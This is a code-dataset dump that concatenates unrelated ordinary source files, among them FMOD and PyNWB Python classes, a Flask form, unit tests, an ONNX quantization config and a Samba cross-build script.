def volume_variation(self):
return self._variations[1]
@volume_variation.setter
def volume_variation(self, var):
v = self._variations
v[1] = var
self._variations = var
@property
def pan_variation(self):
return self._variations[2]
@pan_variation.setter
def pan_variation(self, var):
v = self._variations
v[2] = var
self._variations = var
def lock(self, offset, length):
ptr1 = c_void_p()
len1 = c_uint()
ptr2 = c_void_p()
len2 = c_uint()
ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2)))
return ((ptr1, len1), (ptr2, len2))
def release(self):
ckresult(_dll.FMOD_Sound_Release(self._ptr))
def set_subsound(self, index, snd):
check_type(snd, Sound)
ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr))
def set_subsound_sentence(self, sounds):
a = c_int * len(sounds)
ptrs = [o._ptr for o in sounds]
ai = a(*ptrs)
ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai)))
def unlock(self, i1, i2):
"""I1 and I2 are tuples of form (ptr, len)."""
ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1]))
@property
def music_speed(self):
speed = c_float()
self._call_fmod("FMOD_Sound_GetMusicSpeed", byref(speed))
return speed.value
@music_speed.setter
def music_speed(self, speed):
self._call_fmod("FMOD_Sound_SetMusicSpeed", c_float(speed))
def read_data(self, length):
"""Read a fragment of the sound's decoded data.
:param length: The requested length.
:returns: The data and the actual length.
:rtype: Tuple of the form (data, actual)."""
buf = create_string_buffer(length)
actual = c_uint()
self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual))
return buf.value, actual.value
def seek_data(self, offset):
"""Seeks for data reading purposes.
:param offset: The offset to seek to in PCM samples.
:type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long."""
self._call_fmod("FMOD_Sound_SeekData", offset) | 2.0625 | 2 |
src/pynwb/retinotopy.py | weiglszonja/pynwb | 132 | 11332 | <reponame>weiglszonja/pynwb
from collections.abc import Iterable
import warnings
from hdmf.utils import docval, popargs, call_docval_func, get_docval
from . import register_class, CORE_NAMESPACE
from .core import NWBDataInterface, NWBData
class RetinotopyImage(NWBData):
"""Gray-scale anatomical image of cortical surface. Array structure: [rows][columns]
"""
__nwbfields__ = ('bits_per_pixel',
'dimension',
'format',
'field_of_view')
@docval({'name': 'name', 'type': str, 'doc': 'Name of this retinotopy image'},
{'name': 'data', 'type': Iterable, 'doc': 'Data field.'},
{'name': 'bits_per_pixel', 'type': int,
'doc': 'Number of bits used to represent each value. This is necessary to determine maximum '
'(white) pixel value.'},
{'name': 'dimension', 'type': Iterable, 'shape': (2, ), 'doc': 'Number of rows and columns in the image.'},
{'name': 'format', 'type': Iterable, 'doc': 'Format of image. Right now only "raw" supported.'},
{'name': 'field_of_view', 'type': Iterable, 'shape': (2, ), 'doc': 'Size of viewing area, in meters.'})
def __init__(self, **kwargs):
bits_per_pixel, dimension, format, field_of_view = popargs(
'bits_per_pixel', 'dimension', 'format', 'field_of_view', kwargs)
call_docval_func(super().__init__, kwargs)
self.bits_per_pixel = bits_per_pixel
self.dimension = dimension
self.format = format
self.field_of_view = field_of_view
class FocalDepthImage(RetinotopyImage):
"""Gray-scale image taken with same settings/parameters (e.g., focal depth,
wavelength) as data collection. Array format: [rows][columns].
"""
__nwbfields__ = ('focal_depth', )
@docval(*get_docval(RetinotopyImage.__init__),
{'name': 'focal_depth', 'type': 'float', 'doc': 'Focal depth offset, in meters.'})
def __init__(self, **kwargs):
focal_depth = popargs('focal_depth', kwargs)
call_docval_func(super().__init__, kwargs)
self.focal_depth = focal_depth
class RetinotopyMap(NWBData):
"""Abstract two-dimensional map of responses to stimuli along a single response axis (e.g., altitude)
"""
__nwbfields__ = ('field_of_view',
'dimension')
@docval({'name': 'name', 'type': str, 'doc': 'the name of this axis map'},
{'name': 'data', 'type': Iterable, 'shape': (None, None), 'doc': 'data field.'},
{'name': 'field_of_view', 'type': Iterable, 'shape': (2, ), 'doc': 'Size of viewing area, in meters.'},
{'name': 'dimension', 'type': Iterable, 'shape': (2, ),
'doc': 'Number of rows and columns in the image'})
def __init__(self, **kwargs):
field_of_view, dimension = popargs('field_of_view', 'dimension', kwargs)
call_docval_func(super().__init__, kwargs)
self.field_of_view = field_of_view
self.dimension = dimension
class AxisMap(RetinotopyMap):
"""Abstract two-dimensional map of responses to stimuli along a single response axis (e.g., altitude) with unit
"""
__nwbfields__ = ('unit', )
@docval(*get_docval(RetinotopyMap.__init__, 'name', 'data', 'field_of_view'),
{'name': 'unit', 'type': str, 'doc': 'Unit that axis data is stored in (e.g., degrees)'},
*get_docval(RetinotopyMap.__init__, 'dimension'))
def __init__(self, **kwargs):
unit = popargs('unit', kwargs)
call_docval_func(super().__init__, kwargs)
self.unit = unit
@register_class('ImagingRetinotopy', CORE_NAMESPACE)
class ImagingRetinotopy(NWBDataInterface):
"""
Intrinsic signal optical imaging or widefield imaging for measuring retinotopy. Stores orthogonal
maps (e.g., altitude/azimuth; radius/theta) of responses to specific stimuli and a combined
polarity map from which to identify visual areas.
This group does not store the raw responses imaged during retinotopic mapping or the
stimuli presented, but rather the resulting phase and power maps after applying a Fourier
transform on the averaged responses.
Note: for data consistency, all images and arrays are stored in the format [row][column] and
[row, col], which equates to [y][x]. Field of view and dimension arrays may appear backward
(i.e., y before x).
"""
__nwbfields__ = ({'name': 'sign_map', 'child': True},
{'name': 'axis_1_phase_map', 'child': True},
{'name': 'axis_1_power_map', 'child': True},
{'name': 'axis_2_phase_map', 'child': True},
{'name': 'axis_2_power_map', 'child': True},
{'name': 'focal_depth_image', 'child': True},
{'name': 'vasculature_image', 'child': True},
'axis_descriptions')
@docval({'name': 'sign_map', 'type': RetinotopyMap,
'doc': 'Sine of the angle between the direction of the gradient in axis_1 and axis_2.'},
{'name': 'axis_1_phase_map', 'type': AxisMap,
'doc': 'Phase response to stimulus on the first measured axis.'},
{'name': 'axis_1_power_map', 'type': AxisMap,
'doc': 'Power response on the first measured axis. Response is scaled so 0.0 is no power in '
'the response and 1.0 is maximum relative power.'},
{'name': 'axis_2_phase_map', 'type': AxisMap,
'doc': 'Phase response to stimulus on the second measured axis.'},
{'name': 'axis_2_power_map', 'type': AxisMap,
'doc': 'Power response on the second measured axis. Response is scaled so 0.0 is no '
'power in the response and 1.0 is maximum relative power.'},
{'name': 'axis_descriptions', 'type': Iterable, 'shape': (2, ),
'doc': 'Two-element array describing the contents of the two response axis fields. '
'Description should be something like ["altitude", "azimuth"] or ["radius", "theta"].'},
{'name': 'focal_depth_image', 'type': FocalDepthImage,
'doc': 'Gray-scale image taken with same settings/parameters (e.g., focal depth, wavelength) '
'as data collection. Array format: [rows][columns].'},
{'name': 'vasculature_image', 'type': RetinotopyImage,
'doc': 'Gray-scale anatomical image of cortical surface. Array structure: [rows][columns].'},
{'name': 'name', 'type': str, 'doc': 'the name of this container', 'default': 'ImagingRetinotopy'})
def __init__(self, **kwargs):
axis_1_phase_map, axis_1_power_map, axis_2_phase_map, axis_2_power_map, axis_descriptions, \
focal_depth_image, sign_map, vasculature_image = popargs(
'axis_1_phase_map', 'axis_1_power_map', 'axis_2_phase_map', 'axis_2_power_map',
'axis_descriptions', 'focal_depth_image', 'sign_map', 'vasculature_image', kwargs)
call_docval_func(super().__init__, kwargs)
warnings.warn("The ImagingRetinotopy class currently cannot be written to or read from a file. "
"This is a known bug and will be fixed in a future release of PyNWB.")
self.axis_1_phase_map = axis_1_phase_map
self.axis_1_power_map = axis_1_power_map
self.axis_2_phase_map = axis_2_phase_map
self.axis_2_power_map = axis_2_power_map
self.axis_descriptions = axis_descriptions
self.focal_depth_image = focal_depth_image
self.sign_map = sign_map
self.vasculature_image = vasculature_image
| 2.1875 | 2 |
GreenMoon/forms.py | ma010/green-moon | 0 | 11333 | <reponame>ma010/green-moon
"""
Implement a class function for user to put in a zip-code and
search relevant information about business entities in that zip-code area.
"""
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
class inputZipForm(Form):
inputZip = StringField('inputZip', validators=[DataRequired()])
| 2.96875 | 3 |
Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 11 | 11334 | <reponame>CodedLadiesInnovateTech/python-challenges<gh_stars>10-100
'''
1. Write a Python program to access a specific item in a singly linked list using index value.
2. Write a Python program to set a new value of an item in a singly linked list using index value.
3. Write a Python program to delete the first item from a singly linked list.
'''
| 3.9375 | 4 |
ngboost/version.py | dsharpc/ngboost | 0 | 11335 | <reponame>dsharpc/ngboost
__version__ = "0.3.4dev"
| 0.839844 | 1 |
premailer/tests/test_utils.py | p12tic/premailer | 0 | 11336 | <gh_stars>0
import unittest
from premailer.premailer import capitalize_float_margin
class UtilsTestCase(unittest.TestCase):
def testcapitalize_float_margin(self):
self.assertEqual(
capitalize_float_margin('margin:1em'),
'Margin:1em')
self.assertEqual(
capitalize_float_margin('margin-left:1em'),
'Margin-left:1em')
self.assertEqual(
capitalize_float_margin('float:right;'),
'Float:right;')
self.assertEqual(
capitalize_float_margin('float:right;color:red;margin:0'),
'Float:right;color:red;Margin:0')
| 3.0625 | 3 |
home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | qwertzy-antonio-godinho/dots | 6 | 11337 | <reponame>qwertzy-antonio-godinho/dots<filename>home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py
import sys
try:
try:
from _pydevd_bundle_ext import pydevd_cython as mod
except ImportError:
from _pydevd_bundle import pydevd_cython as mod
except ImportError:
import struct
try:
is_python_64bit = (struct.calcsize('P') == 8)
except:
# In Jython this call fails, but this is Ok, we don't support Jython for speedups anyways.
raise ImportError
plat = '32'
if is_python_64bit:
plat = '64'
# We also accept things as:
#
# _pydevd_bundle.pydevd_cython_win32_27_32
# _pydevd_bundle.pydevd_cython_win32_34_64
#
# to have multiple pre-compiled pyds distributed along the IDE
# (generated by build_tools/build_binaries_windows.py).
mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys.platform, sys.version_info[0], sys.version_info[1], plat)
check_name = '_pydevd_bundle.%s' % (mod_name,)
mod = getattr(__import__(check_name), mod_name)
# Regardless of how it was found, make sure it's later available as the
# initial name so that the expected types from cython in frame eval
# are valid.
sys.modules['_pydevd_bundle.pydevd_cython'] = mod
trace_dispatch = mod.trace_dispatch
PyDBAdditionalThreadInfo = mod.PyDBAdditionalThreadInfo
set_additional_thread_info = mod.set_additional_thread_info
global_cache_skips = mod.global_cache_skips
global_cache_frame_skips = mod.global_cache_frame_skips
_set_additional_thread_info_lock = mod._set_additional_thread_info_lock
fix_top_level_trace_and_get_trace_func = mod.fix_top_level_trace_and_get_trace_func
version = getattr(mod, 'version', 0)
| 1.71875 | 2 |
tests/test_thumbnails.py | pypeclub/openpype4-tests | 0 | 11338 | <reponame>pypeclub/openpype4-tests
from tests.fixtures import api, PROJECT_NAME
assert api
THUMB_DATA1 = b"thisisaveryrandomthumbnailcontent"
THUMB_DATA2 = b"thisihbhihjhuuyiooanothbnlcontent"
def test_folder_thumbnail(api):
response = api.post(
f"projects/{PROJECT_NAME}/folders",
name="testicek",
folderType="Asset",
)
assert response
folder_id = response.data["id"]
# Ensure we cannot create an empty thumbnail
assert not api.raw_post(
f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail",
mime="image/png",
data=b"",
)
# Create a thumbnail for the folder
response = api.raw_post(
f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail",
mime="image/png",
data=THUMB_DATA1,
)
assert response
# Ensure the thumbnail is there
response = api.raw_get(f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail")
assert response == THUMB_DATA1
# Get the id of the thumbnail (we can re-use it later)
thumb1_id = api.get(
f"projects/{PROJECT_NAME}/folders/{folder_id}",
).data["thumbnailId"]
# Update thumbnail
response = api.raw_post(
f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail",
mime="image/png",
data=THUMB_DATA2,
)
assert response
# Ensure the thumbnail changed
response = api.raw_get(f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail")
assert response == THUMB_DATA2
# Let the folder use the old thumbnail
response = api.patch(
f"projects/{PROJECT_NAME}/folders/{folder_id}",
thumbnail_id=thumb1_id,
)
assert response
# Ensure the thumbnail is switched to the old one
response = api.raw_get(f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail")
assert response == THUMB_DATA1
def test_version_thumbnail(api):
# Create folder/subset/version
response = api.post(
f"projects/{PROJECT_NAME}/folders",
name="test2",
folderType="Asset",
)
assert response
folder_id = response.data["id"]
response = api.post(
f"projects/{PROJECT_NAME}/subsets",
name="test2s",
family="theSopranos",
folderId=folder_id,
)
assert response
subset_id = response.data["id"]
response = api.post(
f"projects/{PROJECT_NAME}/versions",
version=1,
subsetId=subset_id,
)
version_id = response.data["id"]
# Create thumbnail for the version
response = api.raw_post(
f"projects/{PROJECT_NAME}/versions/{version_id}/thumbnail",
mime="image/png",
data=THUMB_DATA1,
)
assert response
# Verify that the thumbnail is there
response = api.raw_get(f"projects/{PROJECT_NAME}/versions/{version_id}/thumbnail")
assert response == THUMB_DATA1
| 2.46875 | 2 |
POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | 1 | 11339 | # Generalizando para não repetir o código!
class Pessoa:
def __init__(self, nome, idade):
self.nome = nome
self.idade = idade
self.nomeclasse = self.__class__.__name__
def falar(self):
print(f'{self.nomeclasse} está falando.')
class Cliente(Pessoa):
def comprar(self):
print(f'{self.nomeclasse} está comprando...')
class Aluno(Pessoa):
def estudar(self):
print(f'{self.nomeclasse} está estudando...')
class ClienteVIP(Cliente):
def __init__(self, nome, idade, sobrenome):
super().__init__(nome, idade)
print(f'{self.nome}, {self.idade} anos, criado com sucesso.')
self.sobrenome = sobrenome
def falar(self):
Pessoa.falar(self)
# Como a classe Cliente não possui o método falar(), o Python busca na superclasse o método.
Cliente.falar(self)
print(f'{self.nome} {self.sobrenome}') | 4.0625 | 4 |
nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | 136 | 11340 | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype
from nncf.common.graph.operator_metatypes import UnknownMetatype
DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = {
QuantizationTrait.INPUTS_QUANTIZABLE: [
ONNXConvolutionMetatype,
ONNXLinearMetatype,
ONNXAveragePoolMetatype,
ONNXGlobalAveragePoolMetatype,
ONNXAddLayerMetatype,
ONNXMulLayerMetatype,
ONNXBatchNormMetatype,
ONNXHardSigmoidMetatype,
ONNXResizeMetatype,
],
QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype,
ONNXSoftmaxMetatype,
UnknownMetatype],
QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype],
QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: []
}
| 1.085938 | 1 |
Package/CONFIG.py | YuanYuLin/samba | 0 | 11341 | <filename>Package/CONFIG.py
import ops
import iopc
TARBALL_FILE="samba-4.8.4.tar.gz"
TARBALL_DIR="samba-4.8.4"
INSTALL_DIR="samba-bin"
pkg_path = ""
output_dir = ""
tarball_pkg = ""
tarball_dir = ""
install_dir = ""
install_tmp_dir = ""
cc_host = ""
tmp_include_dir = ""
dst_include_dir = ""
dst_lib_dir = ""
dst_usr_local_lib_dir = ""
def set_global(args):
global pkg_path
global output_dir
global tarball_pkg
global install_dir
global install_tmp_dir
global tarball_dir
global cc_host
global tmp_include_dir
global dst_include_dir
global dst_lib_dir
global dst_usr_local_lib_dir
global dst_usr_local_libexec_dir
global dst_usr_local_share_dir
global dst_usr_local_dir
global src_pkgconfig_dir
global dst_pkgconfig_dir
global dst_bin_dir
global dst_etc_dir
global install_test_utils
pkg_path = args["pkg_path"]
output_dir = args["output_path"]
tarball_pkg = ops.path_join(pkg_path, TARBALL_FILE)
install_dir = ops.path_join(output_dir, INSTALL_DIR)
install_tmp_dir = ops.path_join(output_dir, INSTALL_DIR + "-tmp")
tarball_dir = ops.path_join(output_dir, TARBALL_DIR)
cc_host_str = ops.getEnv("CROSS_COMPILE")
cc_host = cc_host_str[:len(cc_host_str) - 1]
tmp_include_dir = ops.path_join(output_dir, ops.path_join("include",args["pkg_name"]))
dst_include_dir = ops.path_join("include",args["pkg_name"])
dst_lib_dir = ops.path_join(install_dir, "lib")
dst_bin_dir = ops.path_join(install_dir, "bin")
dst_etc_dir = ops.path_join(install_dir, "etc")
dst_usr_local_lib_dir = ops.path_join(install_dir, "usr/local/lib")
dst_usr_local_dir = ops.path_join(install_dir, "usr/local")
dst_usr_local_libexec_dir = ops.path_join(install_dir, "usr/local/libexec")
dst_usr_local_share_dir = ops.path_join(install_dir, "usr/local/share")
src_pkgconfig_dir = ops.path_join(pkg_path, "pkgconfig")
dst_pkgconfig_dir = ops.path_join(install_dir, "pkgconfig")
if ops.getEnv("INSTALL_TEST_UTILS") == 'y':
install_test_utils = True
else:
install_test_utils = False
def MAIN_ENV(args):
set_global(args)
ops.exportEnv(ops.setEnv("CC", ops.getEnv("CROSS_COMPILE") + "gcc"))
'''
ops.exportEnv(ops.setEnv("CXX", ops.getEnv("CROSS_COMPILE") + "g++"))
ops.exportEnv(ops.setEnv("CPP", ops.getEnv("CROSS_COMPILE") + "g++"))
ops.exportEnv(ops.setEnv("AR", ops.getEnv("CROSS_COMPILE") + "ar"))
ops.exportEnv(ops.setEnv("RANLIB", ops.getEnv("CROSS_COMPILE") + "ranlib"))
ops.exportEnv(ops.setEnv("CROSS", ops.getEnv("CROSS_COMPILE")))
'''
ops.exportEnv(ops.setEnv("DESTDIR", install_tmp_dir))
return False
def MAIN_EXTRACT(args):
set_global(args)
ops.unTarGz(tarball_pkg, output_dir)
return True
def MAIN_PATCH(args, patch_group_name):
set_global(args)
for patch in iopc.get_patch_list(pkg_path, patch_group_name):
if iopc.apply_patch(tarball_dir, patch):
continue
else:
sys.exit(1)
return True
def MAIN_CONFIGURE(args):
set_global(args)
job_count = ops.getEnv("BUILD_JOBS_COUNT")
extra_conf = []
'''
#extra_conf.append("--cross-compile")
#extra_conf.append("-C -V")
#extra_conf.append("--cross-answers=cc.txt")
#extra_conf.append("--hostcc=" + cc_host)
extra_conf.append("--abi-check-disable")
extra_conf.append("--disable-rpath")
extra_conf.append("--bundled-libraries=NONE")
#extra_conf.append("--cross-execute='qemu-arm-static -L /usr/arm-linux-gnu'")
extra_conf.append("--jobs=" + job_count)
extra_conf.append("--disable-gnutls")
#extra_conf.append("--private-libraries=NONE")
extra_conf.append("--without-gettext")
extra_conf.append("--without-systemd")
extra_conf.append("--without-ad-dc")
extra_conf.append("--without-ads")
extra_conf.append("--without-winbind")
extra_conf.append("--without-ldap")
extra_conf.append("--without-pam")
extra_conf.append("--without-pie")
extra_conf.append("--without-fam")
extra_conf.append("--without-dmapi")
extra_conf.append("--without-automount")
extra_conf.append("--without-utmp")
extra_conf.append("--without-dnsupdate")
extra_conf.append("--without-acl-support")
extra_conf.append("--without-quotas")
extra_conf.append("--without-cluster-support")
extra_conf.append("--disable-glusterfs")
extra_conf.append("--without-profiling-data")
extra_conf.append("--without-libarchive")
extra_conf.append("--without-regedit")
extra_conf.append("--without-ntvfs-fileserver")
extra_conf.append("--disable-python")
extra_conf.append("--disable-cups")
extra_conf.append("--disable-iprint")
extra_conf.append("--disable-avahi")
'''
extra_conf.append("--disable-python")
extra_conf.append("--without-ad-dc")
extra_conf.append("--without-acl-support")
extra_conf.append("--without-ldap")
extra_conf.append("--without-ads")
extra_conf.append("--without-pam")
extra_conf.append("--without-gettext")
extra_conf.append("--jobs=" + job_count)
extra_conf.append("--without-systemd")
extra_conf.append("--without-regedit")
extra_conf.append("--without-cluster-support")
extra_conf.append("--without-ntvfs-fileserver")
extra_conf.append("--without-winbind")
extra_conf.append("--disable-glusterfs")
extra_conf.append("--disable-cups")
extra_conf.append("--disable-iprint")
extra_conf.append("--disable-avahi")
extra_conf.append("--without-automount")
extra_conf.append("--without-dnsupdate")
extra_conf.append("--without-fam")
extra_conf.append("--without-dmapi")
extra_conf.append("--without-quotas")
extra_conf.append("--without-profiling-data")
extra_conf.append("--without-utmp")
extra_conf.append("--without-libarchive")
#extra_conf.append("--enable-developer")
print extra_conf
#iopc.waf(tarball_dir, extra_conf)
iopc.configure(tarball_dir, extra_conf)
return True
def MAIN_BUILD(args):
set_global(args)
ops.mkdir(install_dir)
ops.mkdir(install_tmp_dir)
iopc.make(tarball_dir)
iopc.make_install(tarball_dir)
ops.mkdir(install_dir)
ops.mkdir(dst_lib_dir)
ops.mkdir(dst_bin_dir)
ops.mkdir(dst_usr_local_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/sbin/nmbd"), dst_bin_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/sbin/smbd"), dst_bin_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libdcerpc-binding.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libdcerpc-binding.so.0.0.1", "libdcerpc-binding.so.0.0")
ops.ln(dst_lib_dir, "libdcerpc-binding.so.0.0.1", "libdcerpc-binding.so.0")
ops.ln(dst_lib_dir, "libdcerpc-binding.so.0.0.1", "libdcerpc-binding.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libdcerpc-samr.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libdcerpc-samr.so.0.0.1", "libdcerpc-samr.so.0.0")
ops.ln(dst_lib_dir, "libdcerpc-samr.so.0.0.1", "libdcerpc-samr.so.0")
ops.ln(dst_lib_dir, "libdcerpc-samr.so.0.0.1", "libdcerpc-samr.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libdcerpc.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libdcerpc.so.0.0.1", "libdcerpc.so.0.0")
ops.ln(dst_lib_dir, "libdcerpc.so.0.0.1", "libdcerpc.so.0")
ops.ln(dst_lib_dir, "libdcerpc.so.0.0.1", "libdcerpc.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr-krb5pac.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr-krb5pac.so.0.0.1", "libndr-krb5pac.so.0.0")
ops.ln(dst_lib_dir, "libndr-krb5pac.so.0.0.1", "libndr-krb5pac.so.0")
ops.ln(dst_lib_dir, "libndr-krb5pac.so.0.0.1", "libndr-krb5pac.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr-nbt.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr-nbt.so.0.0.1", "libndr-nbt.so.0.0")
ops.ln(dst_lib_dir, "libndr-nbt.so.0.0.1", "libndr-nbt.so.0")
ops.ln(dst_lib_dir, "libndr-nbt.so.0.0.1", "libndr-nbt.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr.so.0.1.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr.so.0.1.0", "libndr.so.0.1")
ops.ln(dst_lib_dir, "libndr.so.0.1.0", "libndr.so.0")
ops.ln(dst_lib_dir, "libndr.so.0.1.0", "libndr.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr-standard.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr-standard.so.0.0.1", "libndr-standard.so.0.0")
ops.ln(dst_lib_dir, "libndr-standard.so.0.0.1", "libndr-standard.so.0")
ops.ln(dst_lib_dir, "libndr-standard.so.0.0.1", "libndr-standard.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libnetapi.so.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libnetapi.so.0", "libnetapi.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libnss_winbind.so.2"), dst_lib_dir)
ops.ln(dst_lib_dir, "libnss_winbind.so.2", "libnss_winbind.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libnss_wins.so.2"), dst_lib_dir)
ops.ln(dst_lib_dir, "libnss_wins.so.2", "libnss_wins.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-credentials.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-credentials.so.0.0.1", "libsamba-credentials.so.0.0")
ops.ln(dst_lib_dir, "libsamba-credentials.so.0.0.1", "libsamba-credentials.so.0")
ops.ln(dst_lib_dir, "libsamba-credentials.so.0.0.1", "libsamba-credentials.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-errors.so.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-errors.so.1", "libsamba-errors.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-hostconfig.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-hostconfig.so.0.0.1", "libsamba-hostconfig.so.0.0")
ops.ln(dst_lib_dir, "libsamba-hostconfig.so.0.0.1", "libsamba-hostconfig.so.0")
ops.ln(dst_lib_dir, "libsamba-hostconfig.so.0.0.1", "libsamba-hostconfig.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-passdb.so.0.27.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-passdb.so.0.27.0", "libsamba-passdb.so.0.27")
ops.ln(dst_lib_dir, "libsamba-passdb.so.0.27.0", "libsamba-passdb.so.0")
ops.ln(dst_lib_dir, "libsamba-passdb.so.0.27.0", "libsamba-passdb.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-util.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-util.so.0.0.1", "libsamba-util.so.0.0")
ops.ln(dst_lib_dir, "libsamba-util.so.0.0.1", "libsamba-util.so.0")
ops.ln(dst_lib_dir, "libsamba-util.so.0.0.1", "libsamba-util.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamdb.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamdb.so.0.0.1", "libsamdb.so.0.0")
ops.ln(dst_lib_dir, "libsamdb.so.0.0.1", "libsamdb.so.0")
ops.ln(dst_lib_dir, "libsamdb.so.0.0.1", "libsamdb.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsmbclient.so.0.3.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsmbclient.so.0.3.1", "libsmbclient.so.0.3")
ops.ln(dst_lib_dir, "libsmbclient.so.0.3.1", "libsmbclient.so.0")
ops.ln(dst_lib_dir, "libsmbclient.so.0.3.1", "libsmbclient.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsmbconf.so.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsmbconf.so.0", "libsmbconf.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libtevent-util.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libtevent-util.so.0.0.1", "libtevent-util.so.0.0")
ops.ln(dst_lib_dir, "libtevent-util.so.0.0.1", "libtevent-util.so.0")
ops.ln(dst_lib_dir, "libtevent-util.so.0.0.1", "libtevent-util.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libwbclient.so.0.14"), dst_lib_dir)
ops.ln(dst_lib_dir, "libwbclient.so.0.14", "libwbclient.so.0")
ops.ln(dst_lib_dir, "libwbclient.so.0.14", "libwbclient.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/winbind_krb5_locator.so"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/private/."), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/auth"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/idmap"), dst_lib_dir)
